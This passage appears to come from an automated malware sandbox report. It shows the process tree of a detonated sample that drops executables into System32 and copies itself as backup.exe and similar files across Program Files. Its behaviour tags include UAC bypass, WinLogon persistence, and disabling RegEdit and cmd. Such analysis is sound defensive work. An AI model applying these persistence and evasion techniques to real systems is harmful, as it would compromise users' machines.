    - Disables RegEdit via registry modification
    - Disables cmd.exe use via registry modification
    - Event Triggered Execution: Image File Execution Options Injection
    - Executes dropped EXE
    - Modifies system executable filetype association
    - Adds Run key to start application
    - Checks whether UAC is enabled
    - Drops file in System32 directory
    - Sets desktop wallpaper using registry
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Modifies Control Panel
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    - System policy modification
    PID:2636
  - - C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\winlogon.exe
      C:\Windows\system32\~A~m~B~u~R~a~D~u~L~\winlogon.exe
      4⤵
      Modifies WinLogon for persistence
      Modifies visibility of file extensions in Explorer
      UAC bypass
      Disables RegEdit via registry modification
      Disables cmd.exe use via registry modification
      Event Triggered Execution: Image File Execution Options Injection
      Executes dropped EXE
      Modifies system executable filetype association
      Adds Run key to start application
      Checks whether UAC is enabled
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Modifies Control Panel
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      System policy modification
      PID:3356
    - - C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\winlogon.exe
        
        C:\Windows\system32\~A~m~B~u~R~a~D~u~L~\winlogon.exe
        5⤵
        
        PID:2008
    - - C:\Windows\SysWOW64\Kantuk.exe
        
        C:\Windows\system32\Kantuk.exe
        5⤵
        
        PID:2188
    - - C:\Windows\SysWOW64\4K51K4.exe
        
        C:\Windows\system32\4K51K4.exe
        5⤵
        
        PID:3868
    - - C:\Windows\SysWOW64\K0L4B0R451.exe
        
        C:\Windows\system32\K0L4B0R451.exe
        5⤵
        
        PID:3600
    - - C:\Windows\SysWOW64\GoldenGhost.exe
        
        C:\Windows\system32\GoldenGhost.exe
        5⤵
        
        PID:712
  - - C:\Windows\SysWOW64\Kantuk.exe
      C:\Windows\system32\Kantuk.exe
      4⤵
      PID:4960
  - - C:\Windows\SysWOW64\4K51K4.exe
      C:\Windows\system32\4K51K4.exe
      4⤵
      PID:2896
  - - C:\Windows\SysWOW64\K0L4B0R451.exe
      C:\Windows\system32\K0L4B0R451.exe
      4⤵
      PID:1104
  - - C:\Windows\SysWOW64\GoldenGhost.exe
      C:\Windows\system32\GoldenGhost.exe
      4⤵
      PID:1408
- - C:\Users\Admin\Downloads\240919-hn6jmswcldb34dcf7cb49490197ff10b28deeebcb734cefece1173b2c8fbbb22c41a62acdcN.exe
    C:\Users\Admin\Downloads\240919-hn6jmswcldb34dcf7cb49490197ff10b28deeebcb734cefece1173b2c8fbbb22c41a62acdcN.exe
    3⤵
    - Modifies visibility of file extensions in Explorer
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - System policy modification
    PID:2388
  - - C:\backup.exe
      \backup.exe \
      4⤵
      PID:2420
    - - C:\PerfLogs\backup.exe
        
        C:\PerfLogs\backup.exe C:\PerfLogs\
        5⤵
        
        PID:3428
    - - C:\Program Files\data.exe
        
        "C:\Program Files\data.exe" C:\Program Files\
        5⤵
        
        PID:4188
      - C:\Program Files\7-Zip\backup.exe
        
        "C:\Program Files\7-Zip\backup.exe" C:\Program Files\7-Zip\
        6⤵
        
        PID:2412
        
        C:\Program Files\7-Zip\Lang\backup.exe
        
        "C:\Program Files\7-Zip\Lang\backup.exe" C:\Program Files\7-Zip\Lang\
        7⤵
        
        PID:2864
      - C:\Program Files\Common Files\backup.exe
        
        "C:\Program Files\Common Files\backup.exe" C:\Program Files\Common Files\
        6⤵
        
        PID:3180
        
        C:\Program Files\Common Files\DESIGNER\backup.exe
        
        "C:\Program Files\Common Files\DESIGNER\backup.exe" C:\Program Files\Common Files\DESIGNER\
        7⤵
        
        PID:2432
        
        C:\Program Files\Common Files\microsoft shared\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\backup.exe" C:\Program Files\Common Files\microsoft shared\
        7⤵
        
        PID:2460
        
        C:\Program Files\Common Files\microsoft shared\ClickToRun\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ClickToRun\backup.exe" C:\Program Files\Common Files\microsoft shared\ClickToRun\
        8⤵
        
        PID:4052
        
        C:\Program Files\Common Files\microsoft shared\ink\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\
        8⤵
        
        PID:460
        
        C:\Program Files\Common Files\microsoft shared\ink\ar-SA\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\ar-SA\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\ar-SA\
        9⤵
        
        PID:1040
        
        C:\Program Files\Common Files\microsoft shared\ink\bg-BG\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\bg-BG\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\bg-BG\
        9⤵
        
        PID:2432
        
        C:\Program Files\Common Files\microsoft shared\ink\cs-CZ\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\cs-CZ\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\cs-CZ\
        9⤵
        
        PID:4248
        
        C:\Program Files\Common Files\microsoft shared\ink\da-DK\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\da-DK\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\da-DK\
        9⤵
        
        PID:3156
        
        C:\Program Files\Common Files\microsoft shared\ink\de-DE\data.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\de-DE\data.exe" C:\Program Files\Common Files\microsoft shared\ink\de-DE\
        9⤵
        
        PID:5392
        
        C:\Program Files\Common Files\microsoft shared\ink\el-GR\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\el-GR\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\el-GR\
        9⤵
        
        PID:3852
        
        C:\Program Files\Common Files\microsoft shared\ink\en-GB\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\en-GB\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\en-GB\
        9⤵
        
        PID:6044
        
        C:\Program Files\Common Files\microsoft shared\ink\en-US\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\en-US\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\en-US\
        9⤵
        
        PID:5740
        
        C:\Program Files\Common Files\microsoft shared\ink\es-ES\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\es-ES\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\es-ES\
        9⤵
        
        PID:5044
        
        C:\Program Files\Common Files\microsoft shared\ink\es-MX\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\es-MX\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\es-MX\
        9⤵
        
        PID:5404
        
        C:\Program Files\Common Files\microsoft shared\ink\et-EE\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\et-EE\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\et-EE\
        9⤵
        
        PID:6044
        
        C:\Program Files\Common Files\microsoft shared\ink\fi-FI\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fi-FI\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fi-FI\
        9⤵
        
        PID:6452
        
        C:\Program Files\Common Files\microsoft shared\ink\fr-CA\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fr-CA\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fr-CA\
        9⤵
        
        PID:6956
        
        C:\Program Files\Common Files\microsoft shared\ink\fr-FR\update.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fr-FR\update.exe" C:\Program Files\Common Files\microsoft shared\ink\fr-FR\
        9⤵
        
        PID:6424
        
        C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\
        9⤵
        
        PID:4300
        
        C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\auxpad\
        10⤵
        
        PID:6592
        
        C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\insert\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\insert\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\insert\
        10⤵
        
        PID:632
        
        C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\keypad\
        10⤵
        
        PID:6960
        
        C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\main\
        10⤵
        
        PID:5856
        
        C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskclearui\
        10⤵
        
        PID:936
        
        C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskmenu\
        10⤵
        
        PID:5048
        
        C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknav\
        10⤵
        
        PID:1720
        
        C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad\
        10⤵
        
        PID:400
        
        C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\oskpred\
        10⤵
        
        PID:6840
        
        C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\symbols\
        10⤵
        
        PID:4408
        
        C:\Program Files\Common Files\microsoft shared\ink\he-IL\update.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\he-IL\update.exe" C:\Program Files\Common Files\microsoft shared\ink\he-IL\
        9⤵
        
        PID:5636
        
        C:\Program Files\Common Files\microsoft shared\ink\hr-HR\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\hr-HR\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\hr-HR\
        9⤵
        
        PID:6720
        
        C:\Program Files\Common Files\microsoft shared\ink\hu-HU\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\hu-HU\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\hu-HU\
        9⤵
        
        PID:4676
        
        C:\Program Files\Common Files\microsoft shared\ink\HWRCustomization\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\HWRCustomization\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\HWRCustomization\
        9⤵
        
        PID:1460
        
        C:\Program Files\Common Files\microsoft shared\ink\it-IT\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\it-IT\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\it-IT\
        9⤵
        
        PID:5336
        
        C:\Program Files\Common Files\microsoft shared\ink\ja-JP\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\ja-JP\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\ja-JP\
        9⤵
        
        PID:5104
        
        C:\Program Files\Common Files\microsoft shared\ink\ko-KR\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\ko-KR\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\ko-KR\
        9⤵
        
        PID:6184
        
        C:\Program Files\Common Files\microsoft shared\ink\LanguageModel\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\LanguageModel\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\LanguageModel\
        9⤵
        
        PID:2004
        
        C:\Program Files\Common Files\microsoft shared\ink\lt-LT\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\lt-LT\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\lt-LT\
        9⤵
        
        PID:2956
        
        C:\Program Files\Common Files\microsoft shared\ink\lv-LV\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\lv-LV\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\lv-LV\
        9⤵
        
        PID:4248
        
        C:\Program Files\Common Files\microsoft shared\ink\nb-NO\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\nb-NO\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\nb-NO\
        9⤵
        
        PID:2004
        
        C:\Program Files\Common Files\microsoft shared\ink\nl-NL\update.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\nl-NL\update.exe" C:\Program Files\Common Files\microsoft shared\ink\nl-NL\
        9⤵
        
        PID:676
        
        C:\Program Files\Common Files\microsoft shared\ink\pl-PL\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\pl-PL\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\pl-PL\
        9⤵
        
        PID:5608
        
        C:\Program Files\Common Files\microsoft shared\ink\pt-BR\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\pt-BR\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\pt-BR\
        9⤵
        
        PID:7876
        
        C:\Program Files\Common Files\microsoft shared\ink\pt-PT\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\pt-PT\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\pt-PT\
        9⤵
        
        PID:7984
        
        C:\Program Files\Common Files\microsoft shared\ink\ro-RO\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\ro-RO\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\ro-RO\
        9⤵
        
        PID:4052
        
        C:\Program Files\Common Files\microsoft shared\ink\ru-RU\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\ru-RU\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\ru-RU\
        9⤵
        
        PID:8056
        
        C:\Program Files\Common Files\microsoft shared\ink\sk-SK\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\sk-SK\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\sk-SK\
        9⤵
        
        PID:6064
        
        C:\Program Files\Common Files\microsoft shared\ink\sl-SI\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\sl-SI\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\sl-SI\
        9⤵
        
        PID:7708
        
        C:\Program Files\Common Files\microsoft shared\ink\sr-Latn-RS\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\sr-Latn-RS\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\sr-Latn-RS\
        9⤵
        
        PID:7952
        
        C:\Program Files\Common Files\microsoft shared\ink\sv-SE\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\sv-SE\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\sv-SE\
        9⤵
        
        PID:4972
        
        C:\Program Files\Common Files\microsoft shared\ink\th-TH\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\th-TH\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\th-TH\
        9⤵
        
        PID:3192
        
        C:\Program Files\Common Files\microsoft shared\ink\tr-TR\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\tr-TR\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\tr-TR\
        9⤵
        
        PID:7416
        
        C:\Program Files\Common Files\microsoft shared\ink\uk-UA\data.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\uk-UA\data.exe" C:\Program Files\Common Files\microsoft shared\ink\uk-UA\
        9⤵
        
        PID:7908
        
        C:\Program Files\Common Files\microsoft shared\ink\zh-CN\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\zh-CN\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\zh-CN\
        9⤵
        
        PID:6044
        
        C:\Program Files\Common Files\microsoft shared\ink\zh-TW\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\ink\zh-TW\backup.exe" C:\Program Files\Common Files\microsoft shared\ink\zh-TW\
        9⤵
        
        PID:7172
        
        C:\Program Files\Common Files\microsoft shared\MSInfo\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\MSInfo\backup.exe" C:\Program Files\Common Files\microsoft shared\MSInfo\
        8⤵
        
        PID:5416
        
        C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE\backup.exe" C:\Program Files\Common Files\microsoft shared\MSInfo\de-DE\
        9⤵
        
        PID:6684
        
        C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\update.exe
        
        "C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\update.exe" C:\Program Files\Common Files\microsoft shared\MSInfo\en-US\
        9⤵
        
        PID:6824
        
        C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\backup.exe" C:\Program Files\Common Files\microsoft shared\MSInfo\es-ES\
        9⤵
        
        PID:4932
        
        C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR\data.exe
        
        "C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR\data.exe" C:\Program Files\Common Files\microsoft shared\MSInfo\fr-FR\
        9⤵
        
        PID:5368
        
        C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT\backup.exe" C:\Program Files\Common Files\microsoft shared\MSInfo\it-IT\
        9⤵
        
        PID:5604
        
        C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP\backup.exe" C:\Program Files\Common Files\microsoft shared\MSInfo\ja-JP\
        9⤵
        
        PID:5308
        
        C:\Program Files\Common Files\microsoft shared\MSInfo\uk-UA\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\MSInfo\uk-UA\backup.exe" C:\Program Files\Common Files\microsoft shared\MSInfo\uk-UA\
        9⤵
        
        PID:6700
        
        C:\Program Files\Common Files\microsoft shared\OFFICE16\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\OFFICE16\backup.exe" C:\Program Files\Common Files\microsoft shared\OFFICE16\
        8⤵
        
        PID:6420
        
        C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\backup.exe" C:\Program Files\Common Files\microsoft shared\OFFICE16\Office Setup Controller\
        9⤵
        
        PID:5580
        
        C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\backup.exe" C:\Program Files\Common Files\microsoft shared\OfficeSoftwareProtectionPlatform\
        8⤵
        
        PID:3396
        
        C:\Program Files\Common Files\microsoft shared\Source Engine\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\Source Engine\backup.exe" C:\Program Files\Common Files\microsoft shared\Source Engine\
        8⤵
        
        PID:4272
        
        C:\Program Files\Common Files\microsoft shared\Stationery\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\Stationery\backup.exe" C:\Program Files\Common Files\microsoft shared\Stationery\
        8⤵
        
        PID:7100
        
        C:\Program Files\Common Files\microsoft shared\TextConv\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\TextConv\backup.exe" C:\Program Files\Common Files\microsoft shared\TextConv\
        8⤵
        
        PID:4904
        
        C:\Program Files\Common Files\microsoft shared\TextConv\en-US\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\TextConv\en-US\backup.exe" C:\Program Files\Common Files\microsoft shared\TextConv\en-US\
        9⤵
        
        PID:444
        
        C:\Program Files\Common Files\microsoft shared\Triedit\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\Triedit\backup.exe" C:\Program Files\Common Files\microsoft shared\Triedit\
        8⤵
        
        PID:6920
        
        C:\Program Files\Common Files\microsoft shared\Triedit\en-US\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\Triedit\en-US\backup.exe" C:\Program Files\Common Files\microsoft shared\Triedit\en-US\
        9⤵
        
        PID:5988
        
        C:\Program Files\Common Files\microsoft shared\VC\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\VC\backup.exe" C:\Program Files\Common Files\microsoft shared\VC\
        8⤵
        
        PID:5224
        
        C:\Program Files\Common Files\microsoft shared\VGX\data.exe
        
        "C:\Program Files\Common Files\microsoft shared\VGX\data.exe" C:\Program Files\Common Files\microsoft shared\VGX\
        8⤵
        
        PID:4380
        
        C:\Program Files\Common Files\microsoft shared\VSTO\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\VSTO\backup.exe" C:\Program Files\Common Files\microsoft shared\VSTO\
        8⤵
        
        PID:3304
        
        C:\Program Files\Common Files\microsoft shared\VSTO\10.0\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\backup.exe" C:\Program Files\Common Files\microsoft shared\VSTO\10.0\
        9⤵
        
        PID:6812
        
        C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033\backup.exe
        
        "C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033\backup.exe" C:\Program Files\Common Files\microsoft shared\VSTO\10.0\1033\
        10⤵
        
        PID:6180
        
        C:\Program Files\Common Files\Services\backup.exe
        
        "C:\Program Files\Common Files\Services\backup.exe" C:\Program Files\Common Files\Services\
        7⤵
        
        PID:6988
        
        C:\Program Files\Common Files\System\backup.exe
        
        "C:\Program Files\Common Files\System\backup.exe" C:\Program Files\Common Files\System\
        7⤵
        
        PID:5976
        
        C:\Program Files\Common Files\System\ado\backup.exe
        
        "C:\Program Files\Common Files\System\ado\backup.exe" C:\Program Files\Common Files\System\ado\
        8⤵
        
        PID:6800
        
        C:\Program Files\Common Files\System\ado\de-DE\backup.exe
        
        "C:\Program Files\Common Files\System\ado\de-DE\backup.exe" C:\Program Files\Common Files\System\ado\de-DE\
        9⤵
        
        PID:5868
        
        C:\Program Files\Common Files\System\ado\en-US\backup.exe
        
        "C:\Program Files\Common Files\System\ado\en-US\backup.exe" C:\Program Files\Common Files\System\ado\en-US\
        9⤵
        
        PID:948
        
        C:\Program Files\Common Files\System\ado\es-ES\backup.exe
        
        "C:\Program Files\Common Files\System\ado\es-ES\backup.exe" C:\Program Files\Common Files\System\ado\es-ES\
        9⤵
        
        PID:3384
        
        C:\Program Files\Common Files\System\ado\fr-FR\backup.exe
        
        "C:\Program Files\Common Files\System\ado\fr-FR\backup.exe" C:\Program Files\Common Files\System\ado\fr-FR\
        9⤵
        
        PID:2416
        
        C:\Program Files\Common Files\System\ado\it-IT\backup.exe
        
        "C:\Program Files\Common Files\System\ado\it-IT\backup.exe" C:\Program Files\Common Files\System\ado\it-IT\
        9⤵
        
        PID:5336
        
        C:\Program Files\Common Files\System\ado\ja-JP\backup.exe
        
        "C:\Program Files\Common Files\System\ado\ja-JP\backup.exe" C:\Program Files\Common Files\System\ado\ja-JP\
        9⤵
        
        PID:5632
        
        C:\Program Files\Common Files\System\de-DE\backup.exe
        
        "C:\Program Files\Common Files\System\de-DE\backup.exe" C:\Program Files\Common Files\System\de-DE\
        8⤵
        
        PID:2812
        
        C:\Program Files\Common Files\System\en-US\backup.exe
        
        "C:\Program Files\Common Files\System\en-US\backup.exe" C:\Program Files\Common Files\System\en-US\
        8⤵
        
        PID:4840
        
        C:\Program Files\Common Files\System\es-ES\backup.exe
        
        "C:\Program Files\Common Files\System\es-ES\backup.exe" C:\Program Files\Common Files\System\es-ES\
        8⤵
        
        PID:7136
        
        C:\Program Files\Common Files\System\fr-FR\backup.exe
        
        "C:\Program Files\Common Files\System\fr-FR\backup.exe" C:\Program Files\Common Files\System\fr-FR\
        8⤵
        
        PID:6876
        
        C:\Program Files\Common Files\System\it-IT\backup.exe
        
        "C:\Program Files\Common Files\System\it-IT\backup.exe" C:\Program Files\Common Files\System\it-IT\
        8⤵
        
        PID:5296
        
        C:\Program Files\Common Files\System\ja-JP\backup.exe
        
        "C:\Program Files\Common Files\System\ja-JP\backup.exe" C:\Program Files\Common Files\System\ja-JP\
        8⤵
        
        PID:5600
        
        C:\Program Files\Common Files\System\msadc\backup.exe
        
        "C:\Program Files\Common Files\System\msadc\backup.exe" C:\Program Files\Common Files\System\msadc\
        8⤵
        
        PID:5312
        
        C:\Program Files\Common Files\System\msadc\de-DE\backup.exe
        
        "C:\Program Files\Common Files\System\msadc\de-DE\backup.exe" C:\Program Files\Common Files\System\msadc\de-DE\
        9⤵
        
        PID:532
        
        C:\Program Files\Common Files\System\msadc\en-US\backup.exe
        
        "C:\Program Files\Common Files\System\msadc\en-US\backup.exe" C:\Program Files\Common Files\System\msadc\en-US\
        9⤵
        
        PID:5652
        
        C:\Program Files\Common Files\System\msadc\es-ES\backup.exe
        
        "C:\Program Files\Common Files\System\msadc\es-ES\backup.exe" C:\Program Files\Common Files\System\msadc\es-ES\
        9⤵
        
        PID:3972
        
        C:\Program Files\Common Files\System\msadc\fr-FR\backup.exe
        
        "C:\Program Files\Common Files\System\msadc\fr-FR\backup.exe" C:\Program Files\Common Files\System\msadc\fr-FR\
        9⤵
        
        PID:1152
        
        C:\Program Files\Common Files\System\msadc\it-IT\backup.exe
        
        "C:\Program Files\Common Files\System\msadc\it-IT\backup.exe" C:\Program Files\Common Files\System\msadc\it-IT\
        9⤵
        
        PID:4320
        
        C:\Program Files\Common Files\System\msadc\ja-JP\backup.exe
        
        "C:\Program Files\Common Files\System\msadc\ja-JP\backup.exe" C:\Program Files\Common Files\System\msadc\ja-JP\
        9⤵
        
        PID:2508
        
        C:\Program Files\Common Files\System\Ole DB\backup.exe
        
        "C:\Program Files\Common Files\System\Ole DB\backup.exe" C:\Program Files\Common Files\System\Ole DB\
        8⤵
        
        PID:4312
        
        C:\Program Files\Common Files\System\Ole DB\de-DE\backup.exe
        
        "C:\Program Files\Common Files\System\Ole DB\de-DE\backup.exe" C:\Program Files\Common Files\System\Ole DB\de-DE\
        9⤵
        
        PID:6576
        
        C:\Program Files\Common Files\System\Ole DB\en-US\backup.exe
        
        "C:\Program Files\Common Files\System\Ole DB\en-US\backup.exe" C:\Program Files\Common Files\System\Ole DB\en-US\
        9⤵
        
        PID:6244
        
        C:\Program Files\Common Files\System\Ole DB\es-ES\backup.exe
        
        "C:\Program Files\Common Files\System\Ole DB\es-ES\backup.exe" C:\Program Files\Common Files\System\Ole DB\es-ES\
        9⤵
        
        PID:7308
        
        C:\Program Files\Common Files\System\Ole DB\fr-FR\backup.exe
        
        "C:\Program Files\Common Files\System\Ole DB\fr-FR\backup.exe" C:\Program Files\Common Files\System\Ole DB\fr-FR\
        9⤵
        
        PID:8044
        
        C:\Program Files\Common Files\System\Ole DB\it-IT\backup.exe
        
        "C:\Program Files\Common Files\System\Ole DB\it-IT\backup.exe" C:\Program Files\Common Files\System\Ole DB\it-IT\
        9⤵
        
        PID:7344
        
        C:\Program Files\Common Files\System\Ole DB\ja-JP\backup.exe
        
        "C:\Program Files\Common Files\System\Ole DB\ja-JP\backup.exe" C:\Program Files\Common Files\System\Ole DB\ja-JP\
        9⤵
        
        PID:7732
        
        C:\Program Files\Common Files\System\uk-UA\backup.exe
        
        "C:\Program Files\Common Files\System\uk-UA\backup.exe" C:\Program Files\Common Files\System\uk-UA\
        8⤵
        
        PID:7004
      - C:\Program Files\Crashpad\backup.exe
        
        "C:\Program Files\Crashpad\backup.exe" C:\Program Files\Crashpad\
        6⤵
        
        PID:6972
        
        C:\Program Files\Crashpad\attachments\backup.exe
        
        "C:\Program Files\Crashpad\attachments\backup.exe" C:\Program Files\Crashpad\attachments\
        7⤵
        
        PID:6700
        
        C:\Program Files\Crashpad\reports\backup.exe
        
        "C:\Program Files\Crashpad\reports\backup.exe" C:\Program Files\Crashpad\reports\
        7⤵
        
        PID:692
      - C:\Program Files\dotnet\backup.exe
        
        "C:\Program Files\dotnet\backup.exe" C:\Program Files\dotnet\
        6⤵
        
        PID:7004
        
        C:\Program Files\dotnet\host\backup.exe
        
        "C:\Program Files\dotnet\host\backup.exe" C:\Program Files\dotnet\host\
        7⤵
        
        PID:1220
        
        C:\Program Files\dotnet\host\fxr\backup.exe
        
        "C:\Program Files\dotnet\host\fxr\backup.exe" C:\Program Files\dotnet\host\fxr\
        8⤵
        
        PID:2892
        
        C:\Program Files\dotnet\host\fxr\6.0.27\System Restore.exe
        
        "C:\Program Files\dotnet\host\fxr\6.0.27\System Restore.exe" C:\Program Files\dotnet\host\fxr\6.0.27\
        9⤵
        
        PID:664
        
        C:\Program Files\dotnet\host\fxr\7.0.16\backup.exe
        
